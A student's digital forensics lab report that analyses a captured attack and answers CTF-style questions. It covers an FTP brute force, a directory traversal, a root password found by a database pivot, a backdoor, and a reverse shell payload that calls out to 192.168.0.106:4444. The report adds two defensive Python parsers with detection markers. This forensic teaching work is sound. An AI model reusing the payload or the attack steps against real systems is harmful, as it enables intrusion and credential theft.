Digital Forensics Lab

Cyber Security Department


CYL-2002
Fall 2024
Lab #08

Submitted By:
Abdul Sami Qasim (22i-1725)
Submitted to:
Ubaid Ullah
Tasks:
Scenario:
The organization that previously hired you to investigate the web attack has reached out to you again.
This time, they have managed to capture the network traffic during the attack. They have provided you
with the captured traffic file to help piece together the attacker's intentions and the extent of the damage.
Your job is to analyze the captured traffic and answer the following questions:
Use the file challenge.pcapng for the tasks. Add screenshots of the steps followed for each task.
1. What are the different protocols present in the captured traffic file?

HTTP, FTP, ICMP, TCP/IP

2. It appears that the attacker is attempting to brute force the user's FTP password. Can you find any
evidence of a correct password, and if so, what is it?

The username was ftp and the password used was batman.

3. What additional information was the attacker able to extract from the user's FTP account?

The attacker extracted credentials.txt and .bash_history.
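The brute-force evidence in question 2 and the file retrievals in question 3 can both be pulled out of the FTP control channel automatically. The following Python script is an added example and is not part of the lab report; it assumes the control-channel text has already been exported (for instance with Wireshark's "Follow TCP Stream") and that the sample stream below is constructed: the username, the accepted password and the two retrieved files mirror the lab's findings, while the failed guesses, the server banner and the 192.168.0.105 address are made up.

```python
import re

# Constructed sample of an FTP control channel as exported with Wireshark's
# "Follow TCP Stream" (client commands and server replies interleaved). The
# username, accepted password and the two retrieved files mirror the lab's
# findings; the failed guesses, banner and server address are made up.
SAMPLE_FTP_STREAM = """\
220 (vsFTPd 3.0.3)
USER ftp
331 Please specify the password.
PASS 123456
530 Login incorrect.
USER ftp
331 Please specify the password.
PASS password
530 Login incorrect.
USER ftp
331 Please specify the password.
PASS qwerty
530 Login incorrect.
USER ftp
331 Please specify the password.
PASS letmein
530 Login incorrect.
USER ftp
331 Please specify the password.
PASS batman
230 Login successful.
PASV
227 Entering Passive Mode (192,168,0,105,39,12).
RETR credentials.txt
150 Opening BINARY mode data connection for credentials.txt (57 bytes).
226 Transfer complete.
PASV
227 Entering Passive Mode (192,168,0,105,40,3).
RETR .bash_history
150 Opening BINARY mode data connection for .bash_history (212 bytes).
226 Transfer complete.
QUIT
221 Goodbye.
"""

REPLY_RE = re.compile(r"^(\d{3})[ -]")  # FTP replies start with a 3-digit code


def analyse_ftp_stream(stream, brute_force_threshold=3):
    """Walk one FTP control stream and summarise logins and downloads.

    Returns the number of PASS attempts, how many the server rejected (530),
    the first credential pair it accepted (230), and the files whose RETR
    completed (226). A run of rejections at or above the threshold is
    reported as a suspected brute-force attack.
    """
    attempts = []  # (user, password, reply_code)
    success = None
    retrieved = []
    user = password = pending_retr = None
    for raw in stream.splitlines():
        line = raw.strip()
        m = REPLY_RE.match(line)
        if m:
            code = int(m.group(1))
            # Pair a 530/230 only with a PASS still awaiting its verdict, so a
            # later "530 Please login with USER and PASS." is not miscounted.
            if code in (230, 530) and password is not None:
                attempts.append((user, password, code))
                if code == 230 and success is None:
                    success = (user, password)
                password = None
            elif code == 226 and pending_retr is not None:
                retrieved.append(pending_retr)
                pending_retr = None
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            user = arg
        elif cmd == "PASS":
            password = arg
        elif cmd == "RETR":
            pending_retr = arg
    failures = sum(1 for _, _, code in attempts if code == 530)
    return {
        "attempts": len(attempts),
        "failed_logins": failures,
        "brute_force_suspected": failures >= brute_force_threshold,
        "successful_login": success,
        "files_retrieved": retrieved,
    }


if __name__ == "__main__":
    for key, value in analyse_ftp_stream(SAMPLE_FTP_STREAM).items():
        print(f"{key}: {value}")
```

The script keys on the server's reply codes rather than on the wording of the messages, so it works across FTP daemons; the threshold of three rejected passwords in one control connection is a starting point that a real detection rule would tune to the environment.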


credentials.txt had the following information:

4. What actions did the attacker take with the information obtained from the user's FTP account?

Using the username and password obtained earlier, the attacker logged in to the database and searched
through it for the root account's credentials (which he eventually found).

The attacker logged in as myuser and then ran the queries shown in the screenshot above to locate
the root credentials.

5. What's the root account password?

Username: root
Password: root1amgr000000t!@#$
The password was then changed to “root” using these commands:

6. Can you identify the packet numbers in which the attacker exploited the Remote Code Execution
vulnerability to gain access to the system? What was the exact payload used by the attacker?

The attacker performed multiple requests to command.php, starting with GET requests to probe
the page and test its availability (Packet 2647). They then attempted a directory traversal
attack via images.php to access the /etc/passwd file (Packet 2654–2655). After confirming that
commands could be executed remotely using POST requests (Packet 2665), the attacker finally
sent the reverse shell payload via Packet 2674:

bash -c 'bash -i >& /dev/tcp/192.168.0.106/4444 0>&1'

(the attacker sent the same command in packet number 2678 as well)
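The sequence described above (probe, directory traversal, command execution, reverse shell) is exactly what a detection rule over the decoded HTTP requests should surface, together with the packet numbers an analyst needs. The Python script below is an added example, not code from the lab; it assumes the requests have already been decoded into packet number, method, URI and body (as read off Wireshark's HTTP dissector), and the constructed sample reuses the lab's packet numbers and payload. The parameter names `cmd` and `file` are assumptions, as is treating /command.php as the only command-executing endpoint.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Detection signatures taken from the behaviour described in this lab.
REVERSE_SHELL_MARKERS = ("/dev/tcp/", "bash -i")
TRAVERSAL_MARKERS = ("../", "/etc/passwd")
# Assumed: the application endpoint that executes commands (command.php in the capture).
COMMAND_ENDPOINTS = ("/command.php",)
CALLBACK_RE = re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")

# Constructed sample: packet numbers and the reverse-shell payload are the
# lab's; the parameter names "cmd" and "file" are assumptions.
SAMPLE_REQUESTS = [
    {"no": 2647, "method": "GET", "uri": "/command.php"},
    {"no": 2654, "method": "GET", "uri": "/images.php?file=../../../../etc/passwd"},
    {"no": 2665, "method": "POST", "uri": "/command.php", "body": "cmd=id"},
    {"no": 2674, "method": "POST", "uri": "/command.php",
     "body": "cmd=bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.0.106%2F4444+0%3E%261%27"},
    {"no": 2678, "method": "POST", "uri": "/command.php",
     "body": "cmd=bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.0.106%2F4444+0%3E%261%27"},
]


def request_params(pkt):
    """Collect URL-decoded query-string and form-body parameters of one request."""
    params = parse_qs(urlsplit(pkt["uri"]).query)
    if pkt["method"] == "POST":
        for name, values in parse_qs(pkt.get("body", "")).items():
            params.setdefault(name, []).extend(values)
    return params


def classify_request(pkt):
    """Return (packet_no, category, evidence), or None for a benign-looking request."""
    path = urlsplit(pkt["uri"]).path
    for name, values in request_params(pkt).items():
        for value in values:
            # Check for the reverse shell first: it also goes to the command endpoint.
            if any(marker in value for marker in REVERSE_SHELL_MARKERS):
                return (pkt["no"], "reverse-shell", f"{name}={value}")
            if any(marker in value for marker in TRAVERSAL_MARKERS):
                return (pkt["no"], "path-traversal", f"{name}={value}")
    if path in COMMAND_ENDPOINTS:
        if pkt["method"] == "POST" and pkt.get("body"):
            return (pkt["no"], "command-execution", pkt["body"])
        return (pkt["no"], "probe", f'{pkt["method"]} {pkt["uri"]}')
    return None


def triage(requests):
    """Run the classifier over every decoded request and keep the hits, in packet order."""
    return [f for f in (classify_request(p) for p in requests) if f is not None]


def callback_addresses(findings):
    """Pull the attacker's IP:port out of reverse-shell evidence so the capture can be filtered on it."""
    addrs = set()
    for _, category, evidence in findings:
        if category == "reverse-shell":
            m = CALLBACK_RE.search(evidence)
            if m:
                addrs.add((m.group(1), int(m.group(2))))
    return sorted(addrs)


if __name__ == "__main__":
    findings = triage(SAMPLE_REQUESTS)
    for no, category, evidence in findings:
        print(f"packet {no}: {category}: {evidence}")
    print("callback addresses:", callback_addresses(findings))
```

Decoding with `parse_qs` matters: in the capture the payload travels URL-encoded (`%2Fdev%2Ftcp%2F...`), so a rule that matches on the raw bytes of the request misses it, while a rule that decodes first sees the same `/dev/tcp/192.168.0.106/4444` string the lab quotes.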

7. After gaining access to the system, what does the attacker seem to be doing?

The attacker first tried to read flag.txt. He then stabilized the shell with a python shell-stabilizing
command, listed the directory again and found gr00t.txt, which he opened to read its contents, revealing
the flag ( flag{1_4m_gr00000t!} ).
8. The attacker read a file from root's home directory. What was in that file?

9. The attacker downloaded a file inside root's home directory. What's the purpose of that file?

As the name suggests, it is a backdoor, most likely placed there to give the attacker persistent access
later on. He first checks which python process is running, terminates the python process with
PID 1190466, and then does this:

Here, the attacker runs the backdoor.py that was placed on the system through the root account.

10. What information was transmitted through the attacker's covertly established channel of
communication?
In the covertly established channel of communication (i.e. the backdoor on port 5555), the attacker
sends a command “admin” and then requests the contents of gr00t.txt again.
Flag: stored in gr00t.txt
flag{1_4m_gr00000t!}
